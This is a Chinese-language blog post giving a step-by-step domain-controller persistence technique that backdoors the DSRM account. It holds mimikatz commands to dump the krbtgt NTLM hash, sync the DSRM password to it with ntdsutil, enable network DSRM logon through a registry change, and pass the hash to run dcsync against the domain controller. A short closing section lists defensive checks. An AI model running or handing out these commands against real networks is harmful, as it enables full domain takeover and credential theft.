許可權維持之:域控許可權維持
阿新 • • 發佈:2021-12-18
目錄
- 目錄服務恢復模式(DSRM,Directory Services Restore Mode),是Windows伺服器域控制器的安全模式啟動選項。每個域控制器都有一個本地管理員賬戶 (也就是DSRM賬戶)。
- DSRM用途:允許管理員在域環境中出現故障或崩潰時還原、修復、重建活動目錄資料庫,使域環境的執行恢復正常。在域環境建立初期,DSRM 的密碼需要在安裝 DC 時設定,且很少會被重置。修改 DSRM 密碼最基本的方法是在 DC 上執行ntdsutil 命令列修改。
- 在滲透測試: 可以使用DSRM對域環境進行持久化操作。適用版本為windows server2008(需安裝KB961320才可以使用指定域賬號的密碼對DSRM的密碼進行同步)及以後的版本,windows server2003不能使用此方法。
- 每個域控制器都有本地管理員賬號和密碼(與域管理員賬號和密碼不同)。DSRM賬號可以作為一個域控制器的本地管理員使用者,通過網路連線域控制器,進而控制域控制器。
1 修改 DSRM 密碼
# Win08(已安裝KB961320)及以上,可以將 DSRM 密碼同步為已存在的域賬號密碼。 NTDSUTIL:開啟ntdsutil set DSRM password:修改DSRM的密碼 sync from domain account domainusername:使DSRM的密碼和指定域使用者的密碼同步 q(第1次):退出DSRM密碼設定模式 q(第2次):退出ntdsutil # 補充,直接修改 DSRM密碼 NTDSUTIL:開啟ntdsutil set DSRM password:修改DSRM的密碼 reset password on server null:在當前域控制器上恢復 DSRM 密碼 <PASSWORD>:修改後的密碼 q(第1次):退出DSRM密碼設定模式 q(第2次):退出ntdsutil
2 DSRM 域後門操作過程
-
獲取 krbtgt 的 NTLM hash
# 域控制器中使用mimikatz檢視 krbtgt 的 NTLM hash privilege::debug lsadump::lsa /patch /name:krbtgt # 得到NTLM : fa02a0e57e5ba9189d00990ae64e87ce
-
檢視同步前與同步後 DSRM 賬號的 NTLM hash
# 檢視同步前 DSRM 賬號的 NTLM hash token::elevate lsadump::sam # 將 DSRM 賬號和 krbtgt 的 NTLM Hash 同步 NTDSUTIL set DSRM password sync from domain account krbtgt # 檢視同步後 DSRM 賬號的 NTLM hash lsadump::sam
-
修改 DSRM 的登入方式
DSRM有三種登入方式,具體如下:
- 0:預設值,只有當域控制器重啟並進入DSRM模式時,才可以使用DSRM管理員賬號
- 1:只有當本地AD、DS服務停止時,才可以使用DSRM管理員賬號登入域控制器
- 2:在任何情況下,都可以使用DSRM管理員賬號登入域控制器
- 在 Windows 對 DSRM 使用控制檯登入域控制器進行了限制。如果要使用DSRM賬號通過網路登入域控制器,需要將該值設定為2。
New-ItemProperty "hklm:\system\currentcontrolset\control\lsa\" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD
-
利用 mimikatz 使用 DSRM 賬號通過網路遠端登入域控制器
# 在域成員機器的管理員(如本地管理員)模式下開啟 mimikatz privilege::debug sekurlsa::pth /domain:dc /user:administrator /ntlm:fa02a0e57e5ba9189d00990ae64e87ce # Hash 傳遞完成後,在彈出的命令列視窗中開啟mimikatz,使用 dcsync 功能遠端轉儲 hash。 lsadump::dcsync /domain:test.lab /dc:dc /user:krbtgt dir \\dc\c$
3 DSRM 域後門防禦
- 定期檢測登錄檔中用於控制 DSRM 登入方式的鍵值
hklm:\system\currentcontrolset\control\lsa\dsrmadminlogonbehavior
,確認該鍵值為 1。或者刪除該鍵值。 - 定期修改域中所有域控制器的 DSRM 密碼。
- 經常檢查 ID 為 4794 的日誌,嘗試設定活動目錄服務還原模式的管理員密碼會被記錄在4794日誌中。